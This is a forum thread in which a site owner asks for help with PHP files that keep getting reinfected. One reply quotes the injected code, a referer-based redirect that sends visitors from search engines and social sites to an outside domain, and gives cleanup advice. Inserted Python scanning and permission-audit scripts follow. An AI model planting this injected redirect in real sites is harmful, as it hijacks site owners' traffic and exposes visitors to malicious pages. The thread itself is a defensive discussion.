being hacked

Discussion in 'Web Hosting' started by fung1990, Jan 29, 2012.

  1. fung1990

    fung1990 Power Member

    My web hosting was hacked by some fuxking asshoo.

    They keep adding code to all my PHP files:

    I just cleaned it up and checked again, and it shows up again, after about 24 hours.
    I think I've got a backdoor on my hosting, but I have too many files.

    Need some help.
     
  2. __dark__

    __dark__ Registered Member

    Code:
    error_reporting(0);
    $qazplm=headers_sent();
    if (!$qazplm){
        $referer=$_SERVER['HTTP_REFERER'];
        $uag=$_SERVER['HTTP_USER_AGENT'];
        if ($uag) {
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"************") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    header("Location: http://broadway.bee.pl/");
                    exit();
                }
            }
        }
    }
    Hmm, it seems it redirects all traffic coming from Google, Yahoo, Facebook, anything organic, to his site. That's pretty smart.
    Edit*

    As for what you can do: identify the backdoor. What can I tell you, download all the files and give them a quick scan, or check if your hosting panel has an antivirus scan installed and do it from there. Also, finding the backdoor is half the job; you have to identify the vulnerability that allowed the hacker to upload the shell. Check for any forms that allow upload, or plugins. My guess is that there exists a form that does not filter bad extensions, for example .php extensions.
     
    Last edited: Jan 29, 2012
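Added example, not part of the original thread: a Python sketch that walks a web root and flags PHP files carrying the traits of the snippet posted above (silenced errors, a `headers_sent()` guard, a Referer read and a `Location:` redirect), reporting each file's modification time to help date the re-infection. The marker set, the 3-of-4 threshold and the sample files built in `demo()` are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Heuristics taken from the snippet posted in this thread: the injected code
# silences errors, reads the Referer header, and issues a Location redirect.
MARKERS = {
    "reads_referer": re.compile(r"\$_SERVER\[\s*['\"]HTTP_REFERER['\"]\s*\]"),
    "location_redirect": re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I),
    "errors_silenced": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "headers_sent_guard": re.compile(r"headers_sent\s*\(\s*\)"),
}
THRESHOLD = 3  # assumption: 3 of 4 markers in one file is worth a manual look

def score_file(path):
    """Return the sorted list of marker names found in one file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return sorted(name for name, rx in MARKERS.items() if rx.search(text))

def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk root and return {relative_path: (hits, mtime)} for suspicious files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, name)
            hits = score_file(full)
            if len(hits) >= THRESHOLD:
                findings[os.path.relpath(full, root)] = (hits, os.path.getmtime(full))
    return findings

def demo():
    """Build a constructed two-file web root (sample data) and scan it."""
    injected = ('<?php error_reporting(0); if (!headers_sent()) {'
                ' $r = $_SERVER["HTTP_REFERER"]; if (stristr($r, "yahoo")) {'
                ' header("Location: http://redirect.example/"); exit(); } } ?>')
    clean = '<?php header("Location: https://shop.example/login"); ?>'
    samples = (("index.php", injected + "\n<?php echo 'home'; ?>"), ("login.php", clean))
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples:
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for path, (hits, mtime) in sorted(demo().items()):
        print(path, hits, mtime)
```

Files that share a modification time close to the moment the code reappeared point at when the backdoor ran, which narrows the window to search in the web server access log.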
  3. fung1990

    fung1990 Power Member

    I got some of his affiliate accounts.
    How can I report it by using these tricks?
     
  4. rulez05

    rulez05 Power Member

    You have a nulled script??

    Reading your problem I already have a headache. Good luck finding the backdoor XD
     
  5. popeh

    popeh Newbie

    Little more information might be good, what script(s) are you running? What versions? Are they legit or nulled?
     
  6. HostStage

    HostStage Jr. VIP Jr. VIP Premium Member UnGagged Attendee

    I know where it could come from:

    1) Nulled template / plugin

    2) FileZilla FTP client (AVG was the only one I found to clean it for a web hosting customer)

    GL with that
     
  7. SicKk

    SicKk Newbie

    Take a look if you have any files with permissions like 777, change them to 644, and check if everything is working properly. Take a look at the owner privileges and which owner has the right to change files, if you have more than one for your folder(s).

    Good luck
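Added example, not part of the original thread: a Python sketch of the permission and owner check suggested above. It lists world-writable entries and entries whose owner differs from the web root's owner; suggesting 755 for directories (rather than 644) is an assumption of this example, as are the constructed files in `demo()`.

```python
import os
import stat
import tempfile

def audit_permissions(root):
    """Return sorted (relative_path, mode, suggested_mode, foreign_owner) tuples
    for entries that are world-writable or not owned by the web root's owner."""
    expected_uid = os.stat(root).st_uid
    findings = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode says nothing; audit its target
            mode = stat.S_IMODE(st.st_mode)
            world_writable = bool(mode & stat.S_IWOTH)
            foreign_owner = st.st_uid != expected_uid
            if world_writable or foreign_owner:
                # Assumption: directories need the execute bit, so 755 not 644.
                suggested = 0o755 if stat.S_ISDIR(st.st_mode) else 0o644
                findings.append((os.path.relpath(full, root), oct(mode),
                                 oct(suggested), foreign_owner))
    return sorted(findings)

def demo():
    """Build a constructed web root (sample data) with loose modes and audit it."""
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "uploads")
        os.mkdir(uploads)
        os.chmod(uploads, 0o777)
        samples = (("index.php", 0o644), ("config.php", 0o777),
                   (os.path.join("uploads", "x.php"), 0o666))
        for name, mode in samples:
            path = os.path.join(root, name)
            open(path, "w").close()
            os.chmod(path, mode)  # chmod is explicit, so umask does not interfere
        return audit_permissions(root)

if __name__ == "__main__":
    for path, mode, suggested, foreign in demo():
        print(f"{path}: mode {mode}, suggest {suggested}, foreign owner: {foreign}")
```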
     
  8. _Chip_

    _Chip_ Senior Member

    It's 100% theme related! Your theme is backdoored. Change theme!
     
  9. Maja92

    Maja92 Regular Member

    Take _Chip_'s suggestion and also tell us what scripts/plugins you have running.
     
  10. OldSalt

    OldSalt Moderator Staff Member Moderator Jr. VIP Premium Member

    Are you using a plugin of some sort that allows you to submit php scripts to be executed that you could turn off? Just wondering... cause he/she is obviously entering the change and having your existing scripts execute them... it's either injecting them into a vulnerability or there is a way to execute the external script that is entered into a comment box.

    That's one of the reasons why I don't like allowing php to be executed even in the admin windows...
     
  11. Dax0r

    Dax0r Registered Member

    This backdoor is interesting...
     
  12. fung1990

    fung1990 Power Member

    I am running a couple of scripts, mostly WordPress.
    Still looking for the backdoor.